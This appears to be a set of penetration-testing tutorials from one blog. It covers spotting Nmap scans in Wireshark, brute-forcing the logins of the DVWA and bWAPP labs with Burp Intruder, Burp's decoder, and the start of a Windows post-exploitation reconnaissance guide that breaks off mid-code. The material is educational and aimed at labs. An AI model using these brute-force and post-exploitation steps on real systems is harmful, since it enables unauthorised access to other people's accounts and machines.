For example, if you found a TCP SYN packet then the bit for the SYN flag is set to 1, for which the binary value will be 000000010 and its hexadecimal value 0x02.

NS CWR ECE URG ACK PSH RST SYN FIN
0 0 0 0 0 0 0 1 0

Sometimes you will get a combination of two or more flags in the TCP header; in that scenario take the help of the following table to read the hex value of such a packet and identify which TCP flag bits are set to 1.

For example, if you found TCP SYN/ACK packets, this indicates that the SYN & ACK flags are set to 1, for which the binary value will be 000010010 and its hexadecimal value 0x12.

NS CWR ECE URG ACK PSH RST SYN FIN
0 0 0 0 1 0 0 1 0

Therefore I design below table to let you know more about of Hex value when  two or more than two flags are set 1.


The image given above contains the hex value of TCP-SYN packets and the image given below contains the hex value of TCP-RST/ACK packet from which we can calculate the source port and the destination port of the packet respectively like one given below.


Conclusion: as stated above about the working of the Nmap ICMP scan, we obtained the hex values of every packet in the same sequence. Seeing the packets in this sequence tells the penetration tester that someone has used an Nmap ICMP scan for network enumeration.

Default NMAP Scan (Stealth Scan)

Here we use the default scan method to enumerate the “open” state of a specific port:

nmap -p 80 192.168.1.100

Working of the default scan for an open port:

  1. Send a TCP SYN packet
  2. Receive TCP SYN/ACK
  3. Send a TCP RST packet

It is also known as a half-open TCP scan because the scanner never completes the handshake: instead of answering the SYN/ACK with an ACK it sends RST, so the application on the target never sees an established connection.

Steps to Identify Nmap Default Scan (Stealth Scan)

  • Collect IP Header Details for Protocol Version

For reading the Ethernet header, see our previous article “Network packet forensic”.

NOTE: Ether type for IPv4 is 0x0800.

Try to collect the following details:

  1. IP header length 20 bytes (IHL 5 × 4 = 20 bytes)
  2. Protocol (0x06 for TCP)
  3. Source IP
  4. Destination IP

From the image below you can see the hex values of the IP header fields; use the table to convert them to their actual values.

  • Analyse TCP Header Details

From the image above we obtained the source and destination IP addresses and the protocol (TCP). Now we need to identify the source port, destination port and TCP flags used to set up the connection between the two systems.

In the image the source port is highlighted in light brown and the destination port in yellow; use the table below to read the hex values in the image.


So we see that a TCP SYN packet is used to send the connection request to port 80.

Reading the next packet, the flag value 0x12 shows that a TCP SYN/ACK has been sent from port 80.

Use the table above to read the hex values in the image. The flag value 0x12 means SYN + ACK, as explained above: 0x02 (SYN) + 0x10 (ACK) = 0x12.

In the image below we see that a TCP RST packet (0x04) is sent to port 80 to tear the half-open connection down.


Conclusion: as described above about the working of the Nmap default (stealth) scan, we obtained the hex value of every packet in the same sequence. Seeing the packets in this sequence tells the penetration tester that someone has used an Nmap default scan for network enumeration.

Nmap TCP Scan

Here we use a TCP connect scan to enumerate the state of a specific port:

nmap  -sT  -p 80 192.168.1.100

Working of the TCP connect scan for an open port:

  1. Send a TCP SYN packet
  2. Receive TCP SYN/ACK
  3. Send a TCP ACK packet
  4. Send a TCP RST/ACK packet

Steps to Identify Nmap TCP Scan

  • Collect IP Header Details for Protocol Version

For reading the Ethernet header, see our previous article “Network packet forensic”.

NOTE: Ether type for IPv4 is 0x0800.

Try to collect the following details:

  1. IP header length 20 bytes (IHL 5 × 4 = 20 bytes)
  2. Protocol (0x06 for TCP)
  3. Source IP
  4. Destination IP

It is quite similar to the Nmap stealth scan; use the table to convert these values to their actual meaning.

  • Analyse TCP Header Details

The Nmap TCP connect scan completes the full TCP three-way handshake to enumerate an open port. Identifying the source and destination ports and the flag hex value (TCP SYN) is the same as above.

So we see that a TCP SYN packet is used to send the connection request to port 80.

Reading the next packet, the flag value 0x12 shows that a TCP SYN/ACK has been sent from port 80.


The only difference between the stealth scan and the TCP connect scan is that here a packet with the ACK flag is sent by the source machine that initiated the connection. Reading the next packet, the flag value 0x10 shows that a TCP ACK has been sent to port 80.


Conclusion: as stated above about the working of the Nmap TCP connect scan, we obtained the hex value of every packet in the same sequence. Seeing the packets in this sequence tells the penetration tester that someone has used an Nmap TCP connect scan for network enumeration.

NOTE: the TCP RST/ACK packet that the attacker machine sends to close the connection has the flag value 0x14 (0x04 RST + 0x10 ACK).

Nmap FIN Scan

Here we use a TCP FIN scan to enumerate the “open” state of a particular port on a Linux-based system; execute the command below.

nmap  -sF  -p 22 192.168.1.104

Working of the FIN scan for an open port: send 2 TCP FIN packets to the specific port. An open port gives no reply at all, which is why Nmap retransmits the probe and reports the port as open|filtered.

FIN is a TCP flag, and Nmap sends a bare FIN instead of following the three-way handshake. Per RFC 793 a closed port must answer an unexpected FIN with RST, while an open port silently drops it.

Steps to Identify Nmap FIN Scan

  • Collect IP Header Details for Protocol Version

For reading the Ethernet header, see our previous article “Network packet forensic”.

NOTE: Ether type for IPv4 is 0x0800

Try to collect the following details:

  1. IP header length 20 bytes (IHL 5 × 4 = 20 bytes)
  2. Protocol (0x06 for TCP)
  3. Source IP
  4. Destination IP

It is quite similar to the Nmap scans above; use the table below to convert these values to their actual meaning.

  • Analyse TCP Header Details

Now identify the source and destination ports along with the flag hex value (TCP FIN, 0x01), as above.

From the image below, with the help of the table, we see that a TCP FIN packet is sent to port 22.

Conclusion: as described above about the working of the Nmap FIN scan, we obtained the hex value of every packet in the same sequence.

Seeing the packets in this sequence tells the penetration tester that someone has used an Nmap FIN scan for network enumeration.

NOTE: if the first packet is a FIN (0x01) and the second is an RST (0x04) from the target, the port on the targeted host is closed.

Nmap NULL Scan

Here we use a TCP NULL scan to enumerate the “open” state of a specific port on a Linux-based system.

nmap  -sN  -p 22 192.168.1.104

Working of the NULL scan for an open port: send 2 TCP packets with no flags set to the specific port; as with the FIN scan, an open port does not reply and Nmap reports it as open|filtered.

Here Nmap sets no flag at all (every flag bit is 0) instead of following the three-way handshake.

Steps to Identify Nmap NULL Scan

  • Collect IP Header Details for Protocol Version

For reading the Ethernet header, see our previous article “Network packet forensic”.

NOTE: Ether type for IPv4 is 0x0800

Try to collect the following details:

  1. IP header length 20 bytes (IHL 5 × 4 = 20 bytes)
  2. Protocol (0x06 for TCP)
  3. Source IP
  4. Destination IP

It is quite similar to the Nmap scans above; use the table to convert these values to their actual meaning.


  • Analyse TCP Header Details

Now identify the source and destination ports along with the flag hex value (no flags, 0x00), as above.

From the image below, with the help of the table, we see that a TCP packet with no flags set is sent to port 22.

Conclusion: as stated above about the working of the Nmap NULL scan, we obtained the hex value of every packet in the same sequence.

Seeing the packets in this sequence tells the penetration tester that someone has used an Nmap NULL scan for network enumeration.

NOTE: if the first packet has no flags (0x00) and the second is an RST (0x04) from the target, the port on the target is closed.

Nmap XMAS Scan

Here we use an XMAS scan to enumerate the “open” state of a specific port on a Linux-based system.

nmap  -sX  -p 22 192.168.1.104

Working of the XMAS scan for an open port: send 2 TCP packets with the FIN, PSH and URG flags set to the specific port; as with the FIN and NULL scans, an open port does not reply and Nmap reports it as open|filtered.

Here Nmap sets three TCP flags (FIN, PSH and URG: 0x01 + 0x08 + 0x20 = 0x29) instead of following the three-way handshake; the packet is lit up like a Christmas tree, hence the name.

Steps to Identify Nmap XMAS Scan

  • Collect IP Header Details for Protocol Version

For reading the Ethernet header, see our previous article “Network packet forensic”.

NOTE: Ether type for IPv4 is 0x0800

Try to collect the following details:

  1. IP header length 20 bytes (IHL 5 × 4 = 20 bytes)
  2. Protocol (0x06 for TCP)
  3. Source IP
  4. Destination IP

It is quite similar to the Nmap scans above; use the table to convert these values to their actual meaning.


  • Analyse TCP Header Details

Now identify the source and destination ports along with the flag hex value (XMAS, 0x29), as above.

From the image below, with the help of the table, we see that a TCP packet with the {FIN, PSH, URG} flags set is sent to port 22.

Conclusion: as stated above about the working of the Nmap XMAS scan, we obtained the hex value of every packet in the same sequence.

Seeing the packets in this sequence tells the penetration tester that someone has used an Nmap XMAS scan for network enumeration.

NOTE:

  • If the first packet is a {FIN, PSH, URG} packet (0x29) and the second is an RST (0x04) from the target, the port on the targeted host is closed.
  • The Nmap FIN, NULL and XMAS scans only give meaningful results against TCP stacks that follow RFC 793, such as Linux. Windows and several other stacks answer every such probe with RST regardless of port state, so all ports appear closed.

Nmap UDP Scan

Here we use a UDP scan to enumerate the state of a specific port on a Linux-based system.

nmap  -sU  -p 68 192.168.1.104

Working of the UDP scan for an open port: send 2 UDP packets to the specific port.

It is quite different from the TCP scans because UDP has no flags, so there is no connection request to send; Nmap sends a UDP datagram (empty for most ports, a protocol-specific payload for some well-known ones) and watches for a UDP reply or an ICMP error from the target.

Steps to Identify Nmap UDP Scan

  • Collect IP Header Details for Protocol Version

For reading the Ethernet header, see our previous article “Network packet forensic”.

NOTE: Ether type for IPv4 is 0x0800

Try to collect the following details:

  1. IP header length 20 bytes (IHL 5 × 4 = 20 bytes)
  2. Protocol (0x11, i.e. 17, for UDP)
  3. Source IP
  4. Destination IP

It is quite similar to the Nmap scans above, as the Ethernet header and IP header carry the same fields whether the transport is TCP or UDP; use the table to convert these values to their actual meaning.

The protocol value 0x11 (UDP) is the quickest way to tell an Nmap UDP scan apart from the other scanning methods.

  • Analyse UDP Header Details

Now identify the source and destination ports as done above for the TCP scans; the UDP header is only 8 bytes (source port, destination port, length, checksum) and has no flags field.

Conclusion: seeing the packets in this sequence tells the penetration tester that someone has used an Nmap UDP scan for network enumeration.

NOTE: if the first packet is a UDP probe and the reply is an ICMP type 3 code 3 (port unreachable), the port on the target is closed. An open port usually does not reply at all, which is why Nmap repeats the probe and reports it as open|filtered; only a UDP reply from the target proves the port open.
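The packet sequences described in the default, TCP connect, FIN, NULL, XMAS and UDP sections above can be turned into a small classifier that labels a per-port exchange with the Nmap scan type and the port state it implies. The Python below is an added example (not part of the original article): each packet is given as a tuple of sender ("A" for the scanner, "T" for the target), protocol and detail (the TCP flags byte, None for UDP, or an ICMP (type, code) pair), and the sample exchanges in the usage block are constructed from the article's descriptions rather than taken from its captures.

```python
# Flag byte values as they appear on the wire (low byte of the TCP flags field)
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# Probes that never complete a handshake: RST back means closed, silence means open|filtered
INVERSE_PROBES = {
    FIN: "FIN scan (-sF)",
    0x00: "NULL scan (-sN)",
    FIN | PSH | URG: "XMAS scan (-sX)",
}


def classify_nmap_scan(packets):
    """Classify one port's packet exchange.

    packets: list of (sender, proto, detail) in capture order, where sender is
    "A" (attacker/scanner) or "T" (target), proto is "TCP", "UDP" or "ICMP",
    and detail is the TCP flags byte, None for UDP, or (type, code) for ICMP.
    Returns (scan_name, port_state).
    """
    tcp = [(s, d) for s, p, d in packets if p == "TCP"]
    udp = [(s, d) for s, p, d in packets if p == "UDP"]
    icmp = [(s, d) for s, p, d in packets if p == "ICMP"]

    if udp and not tcp:
        # UDP has no flags: a closed port answers with ICMP type 3 code 3,
        # an open port usually stays silent, so Nmap retries and says open|filtered
        if any(s == "T" and d == (3, 3) for s, d in icmp):
            return "UDP scan (-sU)", "closed"
        if any(s == "T" for s, _ in udp):
            return "UDP scan (-sU)", "open"
        return "UDP scan (-sU)", "open|filtered"

    if not tcp or tcp[0][0] != "A":
        return "unknown", "unknown"
    probe = tcp[0][1]
    target_replies = [d for s, d in tcp if s == "T"]

    if probe == SYN:
        if not target_replies:
            return "SYN or connect scan", "filtered"
        if target_replies[0] & RST:
            # a closed port looks identical for -sS and -sT: SYN then RST/ACK
            return "SYN or connect scan", "closed"
        if target_replies[0] == SYN | ACK:
            after_synack = [d for s, d in tcp[2:] if s == "A"]
            if after_synack and after_synack[0] == ACK:
                return "TCP connect scan (-sT)", "open"   # handshake completed
            if after_synack and after_synack[0] == RST:
                return "SYN scan (-sS)", "open"           # half-open, torn down with RST
            return "SYN or connect scan", "open"
        return "unknown", "unknown"

    if probe in INVERSE_PROBES:
        if any(r & RST for r in target_replies):
            return INVERSE_PROBES[probe], "closed"
        return INVERSE_PROBES[probe], "open|filtered"

    return "unknown", "unknown"


if __name__ == "__main__":
    # Constructed exchanges following the sequences described in the article
    samples = {
        "stealth open": [("A", "TCP", 0x02), ("T", "TCP", 0x12), ("A", "TCP", 0x04)],
        "connect open": [("A", "TCP", 0x02), ("T", "TCP", 0x12), ("A", "TCP", 0x10), ("A", "TCP", 0x14)],
        "xmas closed": [("A", "TCP", 0x29), ("T", "TCP", 0x14)],
        "udp closed": [("A", "UDP", None), ("T", "ICMP", (3, 3))],
    }
    for name, exchange in samples.items():
        print(name, "->", classify_nmap_scan(exchange))
```

Because the scanner is identified from the order and direction of packets on a single port, the function should be fed one port's conversation at a time (filter the capture on the port pair first); mixing ports breaks the assumption that the second packet is the target's reply.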

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Forensic Investigation of Nmap Scan using Wireshark appeared first on Hacking Articles.

Beginners Guide to Burpsuite Payloads (Part 1)


Hello friends!! Today we are discussing the types of payload in Burp Suite. Burp Suite is an application used for testing web application security. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface through to finding and exploiting security vulnerabilities. The tool is written in Java and developed by PortSwigger Security. We are going to use the Intruder feature of Burp Suite, which is used to brute-force web applications. There are 18 types of payload in Intruder:

  • Simple list
  • Runtime File
  • Case Modification
  • Numbers
  • Brute Forcer
  • Character substitution
  • Custom iterator
  • Recursive grep
  • Illegal Unicode
  • Character blocks
  • Dates
  • Null Payloads
  • Character frobber
  • Bit flipper
  • Username generator
  • ECB block shuffler
  • Extension-generated
  • Copy other payload

Simple List

This is the simplest payload type: it lets you configure a short list of strings which are used as payloads.

First, we intercept the request of the login page in the DVWA lab, where we have entered a random username and password. Click on Login and Burp Suite will capture the login request.

Send the captured request to Intruder from the Action tab and follow the steps below. Open the Intruder tab and select Positions; you can see the highlighted username and password. Set the payload positions as follows:

  • Press the Clear button at the right of the window.
  • Select the fields we want to attack, i.e. username and password, and click the Add button.
  • Choose the attack type Cluster bomb.
  • Because both username and password are selected, we need two dictionary files, one for usernames and one for passwords.

Now go to the Payloads tab and select 1 from Payload set (this ‘1’ denotes the first position). Click the Load button and select your username dictionary.

Now select 2 in Payload set and load the password dictionary. Select Start attack from the Intruder menu as shown in the image.

Burp Suite will now try every username and password combination. The moment it finds a valid pair the response Length changes, as shown, which is how the correct username and password stand out from the rest.

To confirm the match, we enter that username and password on the DVWA login page. The message “Welcome to the password protected area admin” shows our success with the Simple list payload.

Runtime File

This payload type lets you configure a file from which the payload strings are read at runtime. It is needed when we require a large list of payloads, because it avoids holding the entire list in memory, and so overcomes the limitation of the Simple list payload type.

First, we intercept the request of the login page in the DVWA lab, where we have entered a random username and password. Click on Login and Burp Suite will capture the login request in the Intercept tab.

Send the captured request to Intruder and follow the steps below. Open the Intruder tab and select Positions; you can see the highlighted password. Set the payload position as follows:

  • Press the Clear button at the right of the window.
  • Select the field we want to attack, i.e. the password field, and click the Add button.
  • Choose the Attack type as
  • Only the password field is selected here, so a single payload set is needed.

Then select the Payload type as Runtime file and give the path of the dictionary in Payload options as /usr/share/wordlists/rockyou.txt, one of the largest wordlists shipped with Kali Linux. Select Start attack from the Intruder menu.

Burp Suite will now try each password; the moment it finds the correct one, the response Length changes as shown.

Case Modification

This payload type lets you configure a list of strings and apply various case modifications to each item. It is useful in password-guessing attacks for generating case variations of dictionary words.

The following case modification rules can be selected:

  • No change – the item is used without being modified.
  • To lower case – all letters in the item are converted to lower case.
  • To upper case – all letters in the item are converted to upper case.
  • To Propername – the first letter in the item is converted to upper case and the remaining letters to lower case.
  • To ProperName – the first letter in the item is converted to upper case and the remaining letters are not changed.

For example, if we select all the modification options, the item “Raj Chandel” generates the following payloads (To ProperName produces “Raj Chandel” again, so there are four distinct strings):

Raj Chandel

raj chandel

RAJ CHANDEL

Raj chandel

First, we intercept the request of the login page in the DVWA lab, where we have entered a random username and password. Click on Login and Burp Suite will capture the login request in the Intercept tab. Send the captured request to Intruder by right-clicking in the request area and selecting Send to Intruder, or simply press Ctrl+I.

Open the Intruder tab and select Positions; you can see the highlighted password. Set the payload position as follows:

  • Press the Clear button at the right of the window.
  • Select the field we want to attack, i.e. the password field, and click the Add button.
  • Choose the Attack type as
  • Only the password field is selected here, so a single payload set is needed.

Then select the Payload type as Case modification. We have ticked No change and To lower case in the Payload options, as shown in the image, and added a default password list using Add from list. Select Start attack from the Intruder menu as shown in the image.

Burp Suite will now try each variant; the moment it finds the correct password, the response Length changes as shown.

Numbers

This payload type generates numeric payloads within a given range and in a specified format.

The following options are available in this payload:

  • Number range:
  • Type – whether the numbers are generated sequentially or randomly.
  • From – if numbers are generated sequentially, the value of the first number; if randomly, the lowest number that may be generated.
  • To – if numbers are generated sequentially, the value of the last number; if randomly, the highest number that may be generated.
  • Step – used when numbers are generated sequentially; the increment between successive numbers.
  • How many – available when numbers are generated randomly; the number of payloads to generate.

First, we intercept the request of the login page in the bWAPP lab, where we have entered a random username and password. Click on Login and Burp Suite will capture the login request.

Send the captured request to Intruder and follow the steps below. Open the Intruder tab and select Positions; you can see the highlighted password. Set the payload position as follows:

  • Press the Clear button at the right of the window.
  • Select the field we want to attack, i.e. the password field, and click the Add button.
  • Choose the Attack type as
  • Only the password field is selected here, so a single payload set is needed.

Then select the Payload type as Numbers, set the number range from 100 to 150 with a step of 1 as shown in the image, and select Start attack from the Intruder menu.

Burp Suite will now try each number; the moment it finds the correct password, the response Length changes as shown.

The password matches a number within the given range. To confirm, we enter that password on the bWAPP login page, which logs us in successfully. This shows our success in the attack.

Brute Forcer

This payload type generates payloads of the specified lengths containing every possible combination (with repetition) of the characters in the given character set; with three characters and a length of 3 that is 3³ = 27 payloads, and the count grows exponentially with both the set size and the length.

The following options are available:

  • Character set – The set of characters to be used in the payloads. Note that the total number of payloads increases exponentially with the size of this set.
  • Min length – The length of the shortest payload.
  • Max length – The length of the longest payload.

First, we intercept the request of the login page in the bWAPP lab, where we have entered a random username and password. Click on Login and Burp Suite will capture the login request.

Send the captured request to Intruder and follow the steps below. Open the Intruder tab and select Positions; you can see the highlighted password. Set the payload position as follows:

  • Press the Clear button at the right of the window.
  • Select the field we want to attack, i.e. the password field, and click the Add button.
  • Choose the Attack type as
  • Only the password field is selected here, so a single payload set is needed.

Then select the Payload type as Brute forcer, where we can give any characters in the Character set; here we have given 213 and set both Min length and Max length to 3, as shown in the image. Set Min length and Max length as needed, keeping in mind that the number of payloads is the set size raised to the power of the length. Select Start attack from the Intruder menu as shown in the image.

Burp Suite will now try each string; the moment it finds the correct password, the response Length changes as shown.
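The five payload types walked through above can be reproduced offline to see exactly what Intruder will send before an attack is run. The Python below is an added example, not Burp's own code or the article's: each function generates the same candidate set as the corresponding Intruder payload type, cluster_bomb combines two sets the way the Cluster bomb attack does, and find_valid applies the response-length trick the screenshots rely on. The login function inside it is a constructed stand-in for the DVWA page, and the admin/password credentials it accepts are made up for the demo.

```python
import itertools
from typing import Callable, Iterable, Iterator, List, Tuple


def simple_list(items: Iterable[str]) -> List[str]:
    """Simple list: the payloads are exactly the strings you typed or loaded."""
    return list(items)


def runtime_file(path: str) -> Iterator[str]:
    """Runtime file: stream one payload per line instead of loading the whole file."""
    with open(path, encoding="utf-8", errors="replace") as handle:
        for line in handle:
            yield line.rstrip("\r\n")


CASE_RULES = {
    "no_change": lambda s: s,
    "lower": str.lower,
    "upper": str.upper,
    "propername": lambda s: s[:1].upper() + s[1:].lower(),  # "To Propername"
    "ProperName": lambda s: s[:1].upper() + s[1:],          # "To ProperName"
}


def case_modification(items: Iterable[str], rules: Iterable[str]) -> List[str]:
    """Case modification: every selected rule applied to every item, in order."""
    rules = list(rules)
    return [CASE_RULES[rule](item) for item in items for rule in rules]


def numbers(start: int, stop: int, step: int = 1) -> List[str]:
    """Numbers (sequential): start..stop inclusive, as decimal strings."""
    return [str(n) for n in range(start, stop + 1, step)]


def brute_forcer(charset: str, min_len: int, max_len: int) -> Iterator[str]:
    """Brute forcer: every string of length min_len..max_len over charset."""
    for length in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            yield "".join(combo)


def cluster_bomb(*payload_sets: Iterable[str]) -> List[Tuple[str, ...]]:
    """Cluster bomb: the cartesian product of the payload sets, one per position."""
    return list(itertools.product(*payload_sets))


def find_valid(candidates: Iterable[Tuple[str, ...]],
               attempt: Callable[..., str]) -> List[Tuple[str, ...]]:
    """Return the candidates whose response length differs from the most common
    length, which is how Intruder's Length column gives the hit away."""
    results = [(cand, len(attempt(*cand))) for cand in candidates]
    lengths = [length for _, length in results]
    baseline = max(set(lengths), key=lengths.count)
    return [cand for cand, length in results if length != baseline]


# Constructed stand-in for the DVWA login page used in the article
def fake_login(username: str, password: str) -> str:
    if (username, password) == ("admin", "password"):
        return "Welcome to the password protected area admin"
    return "Login failed"


if __name__ == "__main__":
    users = simple_list(["admin", "guest"])
    passwords = case_modification(["Password", "letmein"], ["lower", "upper"])
    print(find_valid(cluster_bomb(users, passwords), fake_login))
```

The brute forcer yields lazily for the same reason Intruder offers the Runtime file type: the candidate count is (set size) to the power of the length, and materialising it for a realistic character set would exhaust memory long before the attack finished.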

Great!! We have successfully used the top 5 Burp Suite payload types for a login-page brute-force attack.

Note: in this article (part 1) we have covered five payload types; the remaining types will be discussed in part 2.

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology.

The post Beginners Guide to Burpsuite Payloads (Part 1) appeared first on Hacking Articles.

Burpsuite Encoder & Decoder Tutorial


Burp Suite's Decoder is a tool for transforming encoded data back into its original form, or raw data into various encoded and hashed forms. It can recognise several encoding formats using heuristic techniques. Encoding is the process of putting a sequence of characters (letters, numbers, punctuation and symbols) into a specialised format for efficient transmission or storage; decoding is the reverse, converting an encoded format back into the original. Encoding and decoding are used in data communications, networking and storage.

Today we are discussing the Decoder option of Burp Suite. Burp Suite is a tool used for testing web application security. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface through to finding and exploiting security vulnerabilities. The tool is written in Java and developed by PortSwigger Security.

There are 9 decoder formats in Burp Suite:

  • Plain text
  • URL
  • HTML
  • Base64
  • ASCII Hex
  • Hex
  • Octal
  • Binary
  • Gzip

URL Encoder & Decoder

When you open the Decoder tab in Burp Suite you will see two sections, left and right. The left section holds the input box and, below it, a new box for each transformation applied, so encoding and then decoding gives three boxes. The right section holds the Encode as, Decode as, Hash and Smart decode controls for each box. As shown in the image below, two radio buttons select whether the content of a box is treated as text or as hex.

Enable the Text radio button and enter any input in the first box; here we have given Raj chandel, as shown in the image. Then click Encode as and select URL from the list. The URL-encoded result appears in the second box.

We can decode the encoded text directly by clicking Decode as on the second box and selecting URL. This decodes the URL-encoded text back into plain text in the third box.

HTML Encoder & Decoder

Repeat the same steps with Raj chandel as the input, but this time click Encode as and select HTML. The HTML-encoded result appears in the second box.

Click Decode as on the second box and select HTML to get the plain text back in the third box.

Base64 Encoder & Decoder

Repeat the process with Raj chandel as the input, click Encode as and select Base64. The Base64-encoded result appears in the second box.

Click Decode as on the second box and select Base64 to get the plain text back in the third box.

ASCII Hex Encoder & Decoder

Again enter Raj chandel, click Encode as and select ASCII hex. Each byte of the input is shown as two hex digits in the second box.

Click Decode as on the second box and select ASCII hex to get the plain text back in the third box.

Hex Encoder & Decoder

Repeat as above, this time with Raj chandel 123456789 as the input, click Encode as and select Hex. The hex-encoded result appears in the second box.

Click Decode as on the second box and select Hex to get the plain text back in the third box.

Octal Encoder & Decoder

Repeat again with Raj chandel 123456789 as the input, click Encode as and select Octal. The octal-encoded result appears in the second box.

Click Decode as on the second box and select Octal to get the plain text back in the third box.

Binary Encoder & Decoder

Repeat the same with Raj chandel 123456789 as the input, click Encode as and select Binary. The binary-encoded result appears in the second box.

Click Decode as on the second box and select Binary to get the plain text back in the third box.

Gzip Encoder & Decoder

Enter Raj chandel in the first box, click Encode as and select Gzip. The gzip-compressed result appears in the second box; because it is binary, switch that box to the Hex view to read it.

Click Decode as on the second box and select Gzip to get the plain text back in the third box.
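The transformations above are all a few lines of standard-library Python, and implementing them once makes it clear what each format does to a byte string. The code below is an added example (not from the article or from PortSwigger) that encodes and decodes the article's input Raj chandel in every Decoder format and adds a small smart_decode that guesses the format the way the Smart decode button does. Two assumptions are labelled in the code: the URL and HTML encoders escape every byte, which is what Burp's Decoder output looks like for those formats, and Hex, Octal and Binary are treated per byte; the page does not say how Burp's Hex differs from ASCII hex, so that distinction is not modelled.

```python
import base64
import binascii
import gzip
import html
import re
from urllib.parse import unquote_to_bytes


def url_encode(data: bytes) -> str:
    # Assumption: every byte is escaped as %XX, matching Burp's Decoder output for "URL"
    return "".join(f"%{b:02x}" for b in data)


def url_decode(text: str) -> bytes:
    return unquote_to_bytes(text)


def html_encode(data: bytes) -> str:
    # Assumption: every byte as a hex numeric entity (&#x52;...), like Burp's "HTML"
    return "".join(f"&#x{b:02x};" for b in data)


def html_decode(text: str) -> bytes:
    return html.unescape(text).encode("latin-1")


def base64_encode(data: bytes) -> str:
    return base64.b64encode(data).decode("ascii")


def base64_decode(text: str) -> bytes:
    return base64.b64decode(text)


def ascii_hex_encode(data: bytes) -> str:
    return binascii.hexlify(data).decode("ascii")          # two hex digits per byte


def ascii_hex_decode(text: str) -> bytes:
    return binascii.unhexlify(text)


def octal_encode(data: bytes) -> str:
    return "".join(f"{b:03o}" for b in data)               # three octal digits per byte


def octal_decode(text: str) -> bytes:
    return bytes(int(text[i:i + 3], 8) for i in range(0, len(text), 3))


def binary_encode(data: bytes) -> str:
    return "".join(f"{b:08b}" for b in data)               # eight bits per byte


def binary_decode(text: str) -> bytes:
    return bytes(int(text[i:i + 8], 2) for i in range(0, len(text), 8))


def gzip_encode(data: bytes) -> bytes:
    return gzip.compress(data, mtime=0)                    # fixed mtime -> reproducible bytes


def gzip_decode(data: bytes) -> bytes:
    return gzip.decompress(data)


def smart_decode(text: str) -> bytes:
    """Guess the format the way Decoder's Smart decode does: try the
    unambiguous shapes first and fall back to plain text. Inputs made only
    of digits are ambiguous (octal? hex? a number?) and need an explicit decoder."""
    if "%" in text:
        return url_decode(text)
    if re.fullmatch(r"(&#x?[0-9a-fA-F]+;)+", text):
        return html_decode(text)
    if re.fullmatch(r"[01]{8}(?:[01]{8})*", text):
        return binary_decode(text)
    if re.fullmatch(r"[0-9a-fA-F]+", text) and len(text) % 2 == 0:
        return ascii_hex_decode(text)
    if re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", text) and len(text) % 4 == 0:
        return base64_decode(text)
    return text.encode("utf-8")


if __name__ == "__main__":
    sample = b"Raj chandel"
    for name, enc in (("URL", url_encode), ("HTML", html_encode), ("Base64", base64_encode),
                      ("ASCII hex", ascii_hex_encode), ("Octal", octal_encode),
                      ("Binary", binary_encode)):
        print(f"{name:10} {enc(sample)}")
    print(f"{'Gzip':10} {ascii_hex_encode(gzip_encode(sample))}")
```

Chaining the functions mirrors stacking transformations in the Decoder panels: a value pulled from a cookie is often Base64 over gzip, or URL encoding over Base64, and decoding it is a matter of applying the inverses in reverse order.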

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology. Contact Here

The post Burpsuite Encoder & Decoder Tutorial appeared first on Hacking Articles.

Manual Post Exploitation on Windows PC (System Command)


This article is about post-exploitation on the victim's system using the Windows command line. Once an attacker has a meterpreter session on a remote PC, they can enumerate a great deal of information and make effective changes with a working knowledge of the Windows command line.

Requirement

Attacker: Kali Linux

Target: Windows PC

To follow along, first obtain a meterpreter session on the remote PC, which you can learn from here. After gaining the session, escalate its privileges to Administrator, which you can learn from here.

Now, to access the Windows command line, type shell in the meterpreter session.

Let’s Start!!

Obtain User Details and Privileges

After gaining the meterpreter shell or Windows command line, before doing anything else it is important to know which user we are. This is usually used to verify that the account we gained is the one we were trying to access. It can be done simply with the command whoami.

To get more, we add an option to the whoami command:

[/all]: show all the details about the user.

Example: whoami /all

As seen below we have the username, SID and local group details.

We also get the privileges that are enabled or disabled for the user we are currently logged on as; entries such as SeImpersonatePrivilege or SeDebugPrivilege in the Enabled state are worth noting for later privilege escalation.

Obtain the System Info

This command enumerates a lot of information about the system, such as hostname, domain, time zone and much more.

Example: systeminfo

We can pick out the basic system details (manufacturer, build and model) of the victim's system using findstr.

Example: systeminfo | findstr System

As shown in the screenshot below we get the boot time, manufacturer, model, type, directory and language of the victim's system. Note that findstr matches the word anywhere in the line, so every line containing “System” is printed, not only the ones we wanted.

We can get an approximate location (roughly to the country) of the victim's system from systeminfo.

Here we use findstr with systeminfo to filter the systeminfo results.

Example: systeminfo | findstr Time

As shown in the screenshot below the time zone is UTC+05:30, so the victim's system is most likely in India. The time zone is only a hint: it is set by the user and shared with neighbouring countries, so treat it as a lead rather than proof.

Obtain Memory Details (Physical, Virtual, In Use, Free)

We can get the basic memory details of the victim's system using systeminfo.

Here we use findstr with systeminfo to filter the systeminfo results.

Example: systeminfo | findstr Memory

As shown in the screenshot below the total physical memory is 3.5 GB, of which 1.6 GB is available; we also get the virtual memory details.
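Filtering systeminfo with findstr is quick but brittle: the pattern System also matches System Boot Time, System Directory and System Locale, and the numbers still have to be read by eye. The Python below is an added example (not from the article) that parses saved systeminfo output into a dictionary and pulls out the time zone and memory figures the text above reads off by hand. The output embedded in it is constructed to look like a Windows 10 host; it is not the victim machine from the screenshots, and the parser assumes the standard layout in which each key is at most 26 characters followed by a colon and padding, and continuation lines (hotfix entries) are indented.

```python
import re
from typing import Dict, List, Union

# Constructed sample of `systeminfo` output; not captured from the article's victim.
SYSTEMINFO_SAMPLE = """\
Host Name:                 DESKTOP-LAB01
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.17134 N/A Build 17134
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
System Boot Time:          1/2/2018, 10:15:32 AM
Time Zone:                 (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Total Physical Memory:     3,583 MB
Available Physical Memory: 1,644 MB
Virtual Memory: Max Size:  4,607 MB
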